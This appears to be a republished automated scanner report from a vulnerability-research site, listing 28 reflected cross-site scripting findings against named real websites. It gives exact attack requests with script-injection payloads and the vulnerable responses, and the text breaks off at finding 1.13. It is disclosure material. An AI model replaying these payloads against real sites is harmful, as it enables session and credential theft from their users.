Contractor for Hire: Per Minute, Per Day, Bounty Hunting

Example #1: Automated Vulnerability Crawler: $1/min, max charge is US $10 for 200 URL + 10 Params for
CWE-79, CWE-89 and CWE-113 (XSS, SQL Injection and HTTP Header Injection).
Example #2: Hybrid Risk Analysis: $2/min, max charge is US $30 for 200 URL + 10 Params, Manual Testing of High Value URI/Param targets.
Example #3: Penetration Testing: Individual Case Basis, use Live Chat for a Quote.
Example #4: Report generated by XSS.CX at Tue Nov 30 10:29:55 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research

XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog

Current Research | Full Disclosure | As of March 14, 2011

Plesk SMB 10.2.0 Windows - Site Editor | Full Disclosure
Plesk Small Business Manager 10.2.0 for Windows | Full Disclosure
Hoyt LLC Research | Full Disclosure Report on Stored XSS in SmarterMail 8.0
Hoyt LLC Research - Full Disclosure | Blog Article | SmarterStats 6.0
Hoyt LLC Research - Full Disclosure | Blog Article | SmarterMail 7.x Series
Loading

1. Cross-site scripting (reflected)

1.1. http://app.quotemedia.com/quotetools/miniCharts.go [callback parameter]

1.2. http://app.quotemedia.com/quotetools/miniCharts.go [chbdr parameter]

1.3. http://app.quotemedia.com/quotetools/miniCharts.go [chbdr parameter]

1.4. http://app.quotemedia.com/quotetools/miniCharts.go [chbg parameter]

1.5. http://app.quotemedia.com/quotetools/miniCharts.go [chbg parameter]

1.6. http://app.quotemedia.com/quotetools/miniCharts.go [chbgch parameter]

1.7. http://app.quotemedia.com/quotetools/miniCharts.go [chbgch parameter]

1.8. http://app.quotemedia.com/quotetools/miniCharts.go [chfill parameter]

1.9. http://app.quotemedia.com/quotetools/miniCharts.go [chfill parameter]

1.10. http://app.quotemedia.com/quotetools/miniCharts.go [chfill2 parameter]

1.11. http://app.quotemedia.com/quotetools/miniCharts.go [chfill2 parameter]

1.12. http://app.quotemedia.com/quotetools/miniCharts.go [chhig parameter]

1.13. http://app.quotemedia.com/quotetools/miniCharts.go [chhig parameter]

1.14. http://app.quotemedia.com/quotetools/miniCharts.go [chln parameter]

1.15. http://app.quotemedia.com/quotetools/miniCharts.go [chln parameter]

1.16. http://app.quotemedia.com/quotetools/miniCharts.go [chtype parameter]

1.17. http://app.quotemedia.com/quotetools/miniCharts.go [chtype parameter]

1.18. http://artlibre.org/licence/lalgb.html [REST URL parameter 1]

1.19. http://artlibre.org/licence/lalgb.html [REST URL parameter 2]

1.20. http://centralmaine.mainetoday.com/sports/hsblog/index.xml [REST URL parameter 1]

1.21. http://centralmaine.mainetoday.com/sports/hsblog/index.xml [REST URL parameter 2]

1.22. http://centralmaine.mainetoday.com/sports/hsblog/index.xml [REST URL parameter 3]

1.23. http://centralmaine.mainetoday.com/sports/hsblog/index.xml [name of an arbitrarily supplied request parameter]

1.24. https://crmext.fairpoint.com/eCustomerReg_enu/start.swe ['%22--%3E%3Cscript%3Ealert(0x000182)%3C/script%3E parameter]

1.25. https://crmext.fairpoint.com/eCustomerReg_enu/start.swe ['%22--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E parameter]

1.26. https://crmext.fairpoint.com/eCustomerReg_enu/start.swe [name of an arbitrarily supplied request parameter]

1.27. http://myfairpoint.net/fairpoint/portal/NewsChannel.aspx [ArticleID parameter]

1.28. http://centralmaine.mainetoday.com/sports/hsblog/index.xml [Referer HTTP header]



1. Cross-site scripting (reflected)
There are 28 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://app.quotemedia.com/quotetools/miniCharts.go [callback parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.quotemedia.com
Path:   /quotetools/miniCharts.go

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 9a927<script>alert(1)</script>1dd8eb88889 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /quotetools/miniCharts.go?webmasterId=97824&toolWidth=270&chhig=100&chln=111111&chfill=cccc6600&chfill2=cc6600&chbg=ffffff&chbgch=ffffff&chbdr=111111&chtype=mountain&callback=injectQuoteChart9a927<script>alert(1)</script>1dd8eb88889 HTTP/1.1
Host: app.quotemedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.14
Vary: Accept-Encoding
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Set-Cookie: JSESSIONID=fticEZXJv0a6; path=/
Content-Type: text/html; charset=ISO-8859-1
Date: Tue, 30 Nov 2010 14:12:25 GMT
Content-Length: 4817


/*<script language="javascript"></script>*/
injectQuoteChart9a927<script>alert(1)</script>1dd8eb88889("\n\n<META HTTP-EQUIV=\"imagetoolbar\" CONTENT=\"no\">\n\n\n\n<scr
...[SNIP]...

1.2. http://app.quotemedia.com/quotetools/miniCharts.go [chbdr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.quotemedia.com
Path:   /quotetools/miniCharts.go

Issue detail

The value of the chbdr request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 1c6b0><script>alert(1)</script>0cd72641fa7 was submitted in the chbdr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /quotetools/miniCharts.go?webmasterId=97824&toolWidth=270&chhig=100&chln=111111&chfill=cccc6600&chfill2=cc6600&chbg=ffffff&chbgch=ffffff&chbdr=1111111c6b0><script>alert(1)</script>0cd72641fa7&chtype=mountain&callback=injectQuoteChart HTTP/1.1
Host: app.quotemedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.14
Vary: Accept-Encoding
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Set-Cookie: JSESSIONID=ggOhZ6gUBUVd; path=/
Content-Type: text/html; charset=ISO-8859-1
Date: Tue, 30 Nov 2010 14:12:17 GMT
Content-Length: 4860


/*<script language="javascript"></script>*/
injectQuoteChart("\n\n<META HTTP-EQUIV=\"imagetoolbar\" CONTENT=\"no\">\n\n\n\n<script type=\"text/javascript\">\n\nfunction
...[SNIP]...
h=\"268\" height=\"100\" border=\"0\" \n\n src=\"http://app.quotemedia.com/quotetools/getChart?chscale=1d&webmasterId=97824&snap=true&symbol=GE&chtype=mountain&chwid=268&chhig=100&chbdr=1111111c6b0><script>alert(1)</script>0cd72641fa7&chbg=ffffff&chbgch=ffffff&chfill=cccc6600&chfill2=cc6600&chln=111111&chfrmon=false&chton=some\" GALLERYIMG=\"no\">
...[SNIP]...

1.3. http://app.quotemedia.com/quotetools/miniCharts.go [chbdr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.quotemedia.com
Path:   /quotetools/miniCharts.go

Issue detail

The value of the chbdr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa029</script><script>alert(1)</script>fc783b4984f was submitted in the chbdr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /quotetools/miniCharts.go?webmasterId=97824&toolWidth=270&chhig=100&chln=111111&chfill=cccc6600&chfill2=cc6600&chbg=ffffff&chbgch=ffffff&chbdr=111111fa029</script><script>alert(1)</script>fc783b4984f&chtype=mountain&callback=injectQuoteChart HTTP/1.1
Host: app.quotemedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.14
Vary: Accept-Encoding
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Set-Cookie: JSESSIONID=hIsSoZIEBCvb; path=/
Content-Type: text/html; charset=ISO-8859-1
Date: Tue, 30 Nov 2010 14:12:20 GMT
Content-Length: 4876


/*<script language="javascript"></script>*/
injectQuoteChart("\n\n<META HTTP-EQUIV=\"imagetoolbar\" CONTENT=\"no\">\n\n\n\n<script type=\"text/javascript\">\n\nfunction
...[SNIP]...
document.getElementById('qm_img_8029').src = 'http://app.quotemedia.com/quotetools/getChart?chscale=' + scale + '&webmasterId=97824&snap=true&symbol=GE&chtype=mountain&chwid=268&chhig=100&chbdr=111111fa029</script><script>alert(1)</script>fc783b4984f&chbg=ffffff&chbgch=ffffff&chfill=cccc6600&chfill2=cc6600&chln=111111&chfrmon=false&chton=some';\n\n}\n\nfunction chartForward_8029() {\n\n window.location.href='http://app.quotemedia.com/quotetools/c
...[SNIP]...

1.4. http://app.quotemedia.com/quotetools/miniCharts.go [chbg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.quotemedia.com
Path:   /quotetools/miniCharts.go

Issue detail

The value of the chbg request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload a9352><script>alert(1)</script>df211a09f8c was submitted in the chbg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /quotetools/miniCharts.go?webmasterId=97824&toolWidth=270&chhig=100&chln=111111&chfill=cccc6600&chfill2=cc6600&chbg=ffffffa9352><script>alert(1)</script>df211a09f8c&chbgch=ffffff&chbdr=111111&chtype=mountain&callback=injectQuoteChart HTTP/1.1
Host: app.quotemedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.14
Vary: Accept-Encoding
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Set-Cookie: JSESSIONID=hH_ZuAP1jmC4; path=/
Content-Type: text/html; charset=ISO-8859-1
Date: Tue, 30 Nov 2010 14:12:08 GMT
Content-Length: 4860


/*<script language="javascript"></script>*/
injectQuoteChart("\n\n<META HTTP-EQUIV=\"imagetoolbar\" CONTENT=\"no\">\n\n\n\n<script type=\"text/javascript\">\n\nfunction
...[SNIP]...
ight=\"100\" border=\"0\" \n\n src=\"http://app.quotemedia.com/quotetools/getChart?chscale=1d&webmasterId=97824&snap=true&symbol=GE&chtype=mountain&chwid=268&chhig=100&chbdr=111111&chbg=ffffffa9352><script>alert(1)</script>df211a09f8c&chbgch=ffffff&chfill=cccc6600&chfill2=cc6600&chln=111111&chfrmon=false&chton=some\" GALLERYIMG=\"no\">
...[SNIP]...

1.5. http://app.quotemedia.com/quotetools/miniCharts.go [chbg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.quotemedia.com
Path:   /quotetools/miniCharts.go

Issue detail

The value of the chbg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d58a5</script><script>alert(1)</script>3eae5e94e34 was submitted in the chbg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /quotetools/miniCharts.go?webmasterId=97824&toolWidth=270&chhig=100&chln=111111&chfill=cccc6600&chfill2=cc6600&chbg=ffffffd58a5</script><script>alert(1)</script>3eae5e94e34&chbgch=ffffff&chbdr=111111&chtype=mountain&callback=injectQuoteChart HTTP/1.1
Host: app.quotemedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.14
Vary: Accept-Encoding
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Set-Cookie: JSESSIONID=f9_-BAzE8dAc; path=/
Content-Type: text/html; charset=ISO-8859-1
Date: Tue, 30 Nov 2010 14:12:13 GMT
Content-Length: 4876


/*<script language="javascript"></script>*/
injectQuoteChart("\n\n<META HTTP-EQUIV=\"imagetoolbar\" CONTENT=\"no\">\n\n\n\n<script type=\"text/javascript\">\n\nfunction
...[SNIP]...
tElementById('qm_img_0831').src = 'http://app.quotemedia.com/quotetools/getChart?chscale=' + scale + '&webmasterId=97824&snap=true&symbol=GE&chtype=mountain&chwid=268&chhig=100&chbdr=111111&chbg=ffffffd58a5</script><script>alert(1)</script>3eae5e94e34&chbgch=ffffff&chfill=cccc6600&chfill2=cc6600&chln=111111&chfrmon=false&chton=some';\n\n}\n\nfunction chartForward_0831() {\n\n window.location.href='http://app.quotemedia.com/quotetools/clientForward
...[SNIP]...

1.6. http://app.quotemedia.com/quotetools/miniCharts.go [chbgch parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.quotemedia.com
Path:   /quotetools/miniCharts.go

Issue detail

The value of the chbgch request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66674</script><script>alert(1)</script>ebde3032625 was submitted in the chbgch parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /quotetools/miniCharts.go?webmasterId=97824&toolWidth=270&chhig=100&chln=111111&chfill=cccc6600&chfill2=cc6600&chbg=ffffff&chbgch=ffffff66674</script><script>alert(1)</script>ebde3032625&chbdr=111111&chtype=mountain&callback=injectQuoteChart HTTP/1.1
Host: app.quotemedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.14
Vary: Accept-Encoding
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Set-Cookie: JSESSIONID=huo2xzo9tHy5; path=/
Content-Type: text/html; charset=ISO-8859-1
Date: Tue, 30 Nov 2010 14:12:16 GMT
Content-Length: 4876


/*<script language="javascript"></script>*/
injectQuoteChart("\n\n<META HTTP-EQUIV=\"imagetoolbar\" CONTENT=\"no\">\n\n\n\n<script type=\"text/javascript\">\n\nfunction
...[SNIP]...
qm_img_4619').src = 'http://app.quotemedia.com/quotetools/getChart?chscale=' + scale + '&webmasterId=97824&snap=true&symbol=GE&chtype=mountain&chwid=268&chhig=100&chbdr=111111&chbg=ffffff&chbgch=ffffff66674</script><script>alert(1)</script>ebde3032625&chfill=cccc6600&chfill2=cc6600&chln=111111&chfrmon=false&chton=some';\n\n}\n\nfunction chartForward_4619() {\n\n window.location.href='http://app.quotemedia.com/quotetools/clientForward?targetsym=&ta
...[SNIP]...

1.7. http://app.quotemedia.com/quotetools/miniCharts.go [chbgch parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.quotemedia.com
Path:   /quotetools/miniCharts.go

Issue detail

The value of the chbgch request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload eb744><script>alert(1)</script>e2835e492ae was submitted in the chbgch parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /quotetools/miniCharts.go?webmasterId=97824&toolWidth=270&chhig=100&chln=111111&chfill=cccc6600&chfill2=cc6600&chbg=ffffff&chbgch=ffffffeb744><script>alert(1)</script>e2835e492ae&chbdr=111111&chtype=mountain&callback=injectQuoteChart HTTP/1.1
Host: app.quotemedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.14
Vary: Accept-Encoding
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Set-Cookie: JSESSIONID=ghG9m6Tv5xW8; path=/
Content-Type: text/html; charset=ISO-8859-1
Date: Tue, 30 Nov 2010 14:12:13 GMT
Content-Length: 4860


/*<script language="javascript"></script>*/
injectQuoteChart("\n\n<META HTTP-EQUIV=\"imagetoolbar\" CONTENT=\"no\">\n\n\n\n<script type=\"text/javascript\">\n\nfunction
...[SNIP]...
order=\"0\" \n\n src=\"http://app.quotemedia.com/quotetools/getChart?chscale=1d&webmasterId=97824&snap=true&symbol=GE&chtype=mountain&chwid=268&chhig=100&chbdr=111111&chbg=ffffff&chbgch=ffffffeb744><script>alert(1)</script>e2835e492ae&chfill=cccc6600&chfill2=cc6600&chln=111111&chfrmon=false&chton=some\" GALLERYIMG=\"no\">
...[SNIP]...

1.8. http://app.quotemedia.com/quotetools/miniCharts.go [chfill parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.quotemedia.com
Path:   /quotetools/miniCharts.go

Issue detail

The value of the chfill request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e0f9</script><script>alert(1)</script>a39376222cd was submitted in the chfill parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /quotetools/miniCharts.go?webmasterId=97824&toolWidth=270&chhig=100&chln=111111&chfill=cccc66007e0f9</script><script>alert(1)</script>a39376222cd&chfill2=cc6600&chbg=ffffff&chbgch=ffffff&chbdr=111111&chtype=mountain&callback=injectQuoteChart HTTP/1.1
Host: app.quotemedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.14
Vary: Accept-Encoding
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Set-Cookie: JSESSIONID=gn0UzGlR-dJc; path=/
Content-Type: text/html; charset=ISO-8859-1
Date: Tue, 30 Nov 2010 14:12:04 GMT
Content-Length: 4876


/*<script language="javascript"></script>*/
injectQuoteChart("\n\n<META HTTP-EQUIV=\"imagetoolbar\" CONTENT=\"no\">\n\n\n\n<script type=\"text/javascript\">\n\nfunction
...[SNIP]...
c = 'http://app.quotemedia.com/quotetools/getChart?chscale=' + scale + '&webmasterId=97824&snap=true&symbol=GE&chtype=mountain&chwid=268&chhig=100&chbdr=111111&chbg=ffffff&chbgch=ffffff&chfill=cccc66007e0f9</script><script>alert(1)</script>a39376222cd&chfill2=cc6600&chln=111111&chfrmon=false&chton=some';\n\n}\n\nfunction chartForward_0314() {\n\n window.location.href='http://app.quotemedia.com/quotetools/clientForward?targetsym=&targetex=&targetty
...[SNIP]...

1.9. http://app.quotemedia.com/quotetools/miniCharts.go [chfill parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.quotemedia.com
Path:   /quotetools/miniCharts.go

Issue detail

The value of the chfill request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 75426><script>alert(1)</script>2891c5b109a was submitted in the chfill parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /quotetools/miniCharts.go?webmasterId=97824&toolWidth=270&chhig=100&chln=111111&chfill=cccc660075426><script>alert(1)</script>2891c5b109a&chfill2=cc6600&chbg=ffffff&chbgch=ffffff&chbdr=111111&chtype=mountain&callback=injectQuoteChart HTTP/1.1
Host: app.quotemedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.14
Vary: Accept-Encoding
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Set-Cookie: JSESSIONID=g5gw2IQtuwU9; path=/
Content-Type: text/html; charset=ISO-8859-1
Date: Tue, 30 Nov 2010 14:12:00 GMT
Content-Length: 4860


/*<script language="javascript"></script>*/
injectQuoteChart("\n\n<META HTTP-EQUIV=\"imagetoolbar\" CONTENT=\"no\">\n\n\n\n<script type=\"text/javascript\">\n\nfunction
...[SNIP]...
src=\"http://app.quotemedia.com/quotetools/getChart?chscale=1d&webmasterId=97824&snap=true&symbol=GE&chtype=mountain&chwid=268&chhig=100&chbdr=111111&chbg=ffffff&chbgch=ffffff&chfill=cccc660075426><script>alert(1)</script>2891c5b109a&chfill2=cc6600&chln=111111&chfrmon=false&chton=some\" GALLERYIMG=\"no\">
...[SNIP]...

1.10. http://app.quotemedia.com/quotetools/miniCharts.go [chfill2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.quotemedia.com
Path:   /quotetools/miniCharts.go

Issue detail

The value of the chfill2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53877</script><script>alert(1)</script>62927242a3c was submitted in the chfill2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /quotetools/miniCharts.go?webmasterId=97824&toolWidth=270&chhig=100&chln=111111&chfill=cccc6600&chfill2=cc660053877</script><script>alert(1)</script>62927242a3c&chbg=ffffff&chbgch=ffffff&chbdr=111111&chtype=mountain&callback=injectQuoteChart HTTP/1.1
Host: app.quotemedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.14
Vary: Accept-Encoding
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Set-Cookie: JSESSIONID=hv0-pYf617I5; path=/
Content-Type: text/html; charset=ISO-8859-1
Date: Tue, 30 Nov 2010 14:12:07 GMT
Content-Length: 4876


/*<script language="javascript"></script>*/
injectQuoteChart("\n\n<META HTTP-EQUIV=\"imagetoolbar\" CONTENT=\"no\">\n\n\n\n<script type=\"text/javascript\">\n\nfunction
...[SNIP]...
.quotemedia.com/quotetools/getChart?chscale=' + scale + '&webmasterId=97824&snap=true&symbol=GE&chtype=mountain&chwid=268&chhig=100&chbdr=111111&chbg=ffffff&chbgch=ffffff&chfill=cccc6600&chfill2=cc660053877</script><script>alert(1)</script>62927242a3c&chln=111111&chfrmon=false&chton=some';\n\n}\n\nfunction chartForward_6755() {\n\n window.location.href='http://app.quotemedia.com/quotetools/clientForward?targetsym=&targetex=&targettype=&qmpage=true
...[SNIP]...

1.11. http://app.quotemedia.com/quotetools/miniCharts.go [chfill2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.quotemedia.com
Path:   /quotetools/miniCharts.go

Issue detail

The value of the chfill2 request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload e7fcc><script>alert(1)</script>a218fac7adb was submitted in the chfill2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /quotetools/miniCharts.go?webmasterId=97824&toolWidth=270&chhig=100&chln=111111&chfill=cccc6600&chfill2=cc6600e7fcc><script>alert(1)</script>a218fac7adb&chbg=ffffff&chbgch=ffffff&chbdr=111111&chtype=mountain&callback=injectQuoteChart HTTP/1.1
Host: app.quotemedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.14
Vary: Accept-Encoding
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Set-Cookie: JSESSIONID=frgNXUnZAx6a; path=/
Content-Type: text/html; charset=ISO-8859-1
Date: Tue, 30 Nov 2010 14:12:04 GMT
Content-Length: 4860


/*<script language="javascript"></script>*/
injectQuoteChart("\n\n<META HTTP-EQUIV=\"imagetoolbar\" CONTENT=\"no\">\n\n\n\n<script type=\"text/javascript\">\n\nfunction
...[SNIP]...
"http://app.quotemedia.com/quotetools/getChart?chscale=1d&webmasterId=97824&snap=true&symbol=GE&chtype=mountain&chwid=268&chhig=100&chbdr=111111&chbg=ffffff&chbgch=ffffff&chfill=cccc6600&chfill2=cc6600e7fcc><script>alert(1)</script>a218fac7adb&chln=111111&chfrmon=false&chton=some\" GALLERYIMG=\"no\">
...[SNIP]...

1.12. http://app.quotemedia.com/quotetools/miniCharts.go [chhig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.quotemedia.com
Path:   /quotetools/miniCharts.go

Issue detail

The value of the chhig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f122</script><script>alert(1)</script>212c1a3098f was submitted in the chhig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /quotetools/miniCharts.go?webmasterId=97824&toolWidth=270&chhig=1006f122</script><script>alert(1)</script>212c1a3098f&chln=111111&chfill=cccc6600&chfill2=cc6600&chbg=ffffff&chbgch=ffffff&chbdr=111111&chtype=mountain&callback=injectQuoteChart HTTP/1.1
Host: app.quotemedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.14
Vary: Accept-Encoding
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Set-Cookie: JSESSIONID=gR3ZeH8rcMUg; path=/
Content-Type: text/html; charset=ISO-8859-1
Date: Tue, 30 Nov 2010 14:11:56 GMT
Content-Length: 4876


/*<script language="javascript"></script>*/
injectQuoteChart("\n\n<META HTTP-EQUIV=\"imagetoolbar\" CONTENT=\"no\">\n\n\n\n<script type=\"text/javascript\">\n\nfunction
...[SNIP]...
}\n\n\n\n document.getElementById('qm_img_3830').src = 'http://app.quotemedia.com/quotetools/getChart?chscale=' + scale + '&webmasterId=97824&snap=true&symbol=GE&chtype=mountain&chwid=268&chhig=1006f122</script><script>alert(1)</script>212c1a3098f&chbdr=111111&chbg=ffffff&chbgch=ffffff&chfill=cccc6600&chfill2=cc6600&chln=111111&chfrmon=false&chton=some';\n\n}\n\nfunction chartForward_3830() {\n\n window.location.href='http://app.quotemedia.com
...[SNIP]...

1.13. http://app.quotemedia.com/quotetools/miniCharts.go [chhig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.quotemedia.com
